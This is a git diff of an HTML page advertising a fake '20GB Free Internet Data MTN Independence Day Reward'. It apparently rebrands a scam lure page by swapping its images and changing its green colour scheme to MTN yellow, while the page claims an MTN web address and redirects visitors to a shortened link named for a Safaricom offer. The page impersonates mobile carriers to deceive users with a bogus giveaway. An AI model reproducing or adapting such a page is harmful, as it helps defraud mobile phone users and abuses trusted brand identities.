--- a/20GB&.html
+++ b/20GB&.html
@@ -92,15 +92,15 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
      <meta property="og:url" content="www.mtnonline.com">
 
-    <meta content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxjGLPulISgCN00k1Eshzq5SIpaQSTlsI33MaNKmYxeIFkTXvOWyoeP3GSwcNPaCQyatFzjBFYwaFcR76UmqxZs69AFN3MU5NXbutuAvGxK5DIsun4Z6f6stTS-DmjOePWMsw_empb9fVfCtKxWDexOklC-Krh9QA6qSRyNEbHNMMBYLzqW6RiH-HT1As/s1179/564wtdyfjk.jpeg" property="og:image">
+    <meta content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7WZEexrpa3o5wIkEog0ojQbulGjGy9WJEP1E2sNbaEt9ehdjf2HybsdNSd1owLOjhTEXJOj2kPIL1bQETa8NU0os3JGDxlre8jw3AmSpYm65gxJ38hglnE0DTsDjics_LamMY5VAo806ApqEZIIxm1ZElXWOlsgDO3qi3W_iRVBhwF62Jotc1nCE3PEU/s320/WhatsApp%20Image%202025-07-05%20at%2021.37.04_11be14b0.jpg" property="og:image">
 
      <meta property="og:title" content="🎊 20GB Free Internet Data MTN Independence Day Reward 🎁">
 
     <meta content="To reward our customers over the years, we are offering 20GB free internet data" property="og:description">
 
-    <link href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxjGLPulISgCN00k1Eshzq5SIpaQSTlsI33MaNKmYxeIFkTXvOWyoeP3GSwcNPaCQyatFzjBFYwaFcR76UmqxZs69AFN3MU5NXbutuAvGxK5DIsun4Z6f6stTS-DmjOePWMsw_empb9fVfCtKxWDexOklC-Krh9QA6qSRyNEbHNMMBYLzqW6RiH-HT1As/s1179/564wtdyfjk.jpeg" rel="image_src">
+    <link href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7WZEexrpa3o5wIkEog0ojQbulGjGy9WJEP1E2sNbaEt9ehdjf2HybsdNSd1owLOjhTEXJOj2kPIL1bQETa8NU0os3JGDxlre8jw3AmSpYm65gxJ38hglnE0DTsDjics_LamMY5VAo806ApqEZIIxm1ZElXWOlsgDO3qi3W_iRVBhwF62Jotc1nCE3PEU/s320/WhatsApp%20Image%202025-07-05%20at%2021.37.04_11be14b0.jpg" rel="image_src">
 
-    <link href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxjGLPulISgCN00k1Eshzq5SIpaQSTlsI33MaNKmYxeIFkTXvOWyoeP3GSwcNPaCQyatFzjBFYwaFcR76UmqxZs69AFN3MU5NXbutuAvGxK5DIsun4Z6f6stTS-DmjOePWMsw_empb9fVfCtKxWDexOklC-Krh9QA6qSRyNEbHNMMBYLzqW6RiH-HT1As/s1179/564wtdyfjk.jpeg" rel="icon" type="image/x-icon">
+    <link href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7WZEexrpa3o5wIkEog0ojQbulGjGy9WJEP1E2sNbaEt9ehdjf2HybsdNSd1owLOjhTEXJOj2kPIL1bQETa8NU0os3JGDxlre8jw3AmSpYm65gxJ38hglnE0DTsDjics_LamMY5VAo806ApqEZIIxm1ZElXWOlsgDO3qi3W_iRVBhwF62Jotc1nCE3PEU/s320/WhatsApp%20Image%202025-07-05%20at%2021.37.04_11be14b0.jpg" rel="icon" type="image/x-icon">
 
     <meta property="og:updated_time" content="1440432930"/>
 
@@ -128,9 +128,9 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
             --color-primary: rgb(37, 38, 38);
 
-            --color-secondary: #2cb34a;
+            --color-secondary: #FFCB05;
 
-             --color-secondary2: #2cb34a
+             --color-secondary2: #FFCB05
 
         }
 
@@ -738,7 +738,7 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
             margin: 0 auto 20px;
 
-            background-image: linear-gradient(to bottom right, #2cb34a, #2cb34a);
+            background-image: linear-gradient(to bottom right, #FFCB05, #FFCB05);
 
             color:white;
 
@@ -854,7 +854,7 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
           transition: 0.2s linear;
 
-          background-image: linear-gradient(to bottom right, #2cb34a, #2cb34a);
+          background-image: linear-gradient(to bottom right, #FFCB05, #FFCB05);
 
         }
 
@@ -956,7 +956,7 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
             margin: 0 0 20px 3.5rem;
 
-            background-image: linear-gradient(to bottom right, #2cb34a, #2cb34a);
+            background-image: linear-gradient(to bottom right, #FFCB05, #FFCB05);
 
         }
 
@@ -1514,13 +1514,13 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
                     <svg id="loading-svg" class="js-hidden" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto; " viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="10rem">
 
-                        <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#2cb34a" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
+                        <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#FFCB05" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
 
                             <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
 
                         </circle>
 
-                        <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#2cb34a" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
+                        <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#FFCB05" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
 
                             <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
 
@@ -1646,13 +1646,13 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
                             <svg id="first-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="3.2rem">
 
-                                <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#2cb34a" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
+                                <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#FFCB05" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
 
                                     <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
 
                                 </circle>
 
-                                <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#2cb34a" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
+                                <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#FFCB05" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
 
                                     <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
 
@@ -1722,13 +1722,13 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
                             <svg id="second-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="3.2rem">
 
-                                <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#2cb34a" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
+                                <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#FFCB05" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
 
                                     <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
 
                                 </circle>
 
-                                <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#2cb34a" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
+                                <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#FFCB05" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
 
                                     <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
 
@@ -1802,13 +1802,13 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
                         <svg class="quedate__animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="10rem">
 
-                            <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#2cb34a" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
+                            <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#FFCB05" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
 
                                 <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
 
                             </circle>
 
-                            <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#2cb34a" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
+                            <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#FFCB05" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
 
                                 <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
 
@@ -1910,7 +1910,7 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
                 <svg class="loading2__permission" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid">
 
-                    <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#2cb34a" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
+                    <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#FFCB05" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
 
                         <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
 
@@ -1984,13 +1984,13 @@ location.href='https://tinyurl.com/Safaricom-Easter-Offer';
 
                         <svg id="third-loading" class="quedate__load-animate" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style=" shape-rendering: auto;" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" width="3.2rem">
 
-                            <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#2cb34a" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
+                            <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#FFCB05" stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round" transform="rotate(214.395 50 50)">
 
                                 <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
 
                             </circle>
 
-                            <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#2cb34a" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
+                            <circle cx="50" cy="50" r="23" stroke-width="8" stroke="#FFCB05" stroke-dasharray="36.12831551628262 36.12831551628262" stroke-dashoffset="36.12831551628262" fill="none" stroke-linecap="round" transform="rotate(-214.395 50 50)">
 
                                 <animateTransform attributeName="transform" type="rotate" dur="1s" repeatCount="indefinite" keyTimes="0;1" values="0 50 50;-360 50 50"></animateTransform>
 
@@ -2310,7 +2310,7 @@ function operatorDataBack() {
 
 	<center>
 
-			    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVsl-aNDHjDpU_KqbdhndS_T3Z8gJ93DfhqAhh-VwyIyE1HE88Wz8H6pc8f9ypUwl46HwmgsWo5DMQ-bSbVQGyHJIjUfz-MHKG-knrd1sd2K1nI77hqVliZicHfj4xD1brvz87bQjxyaBeypva0wDMSUuEkUunUbdMKUv3Kgsqof9HTdc7zPAYnXg9d5Y/s1179/647feytufgj.jpeg" alt="Free-Data" style="width: 100%;"></center>   
+			    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiacCdHp2II126xudzUxeU3-CzyYPceuK2o9-14OTYjFmio73mfhkumkWN6lhpmo7FexZZmer-AJ4sjWomVfRjfuLKR4uNygym7gW0pTND84nor0AKJwoapJAws0Tzwn8iy45axtAQwlO7movvGl4R5EeRy-Tg3eMLaDmHnthoSZnLCdylI9HukbhlEbJs/s320/WhatsApp%20Image%202025-07-05%20at%2021.37.04_698adc66.jpg" alt="Free-Data" style="width: 100%;"></center>   
 
 			    <br>
 
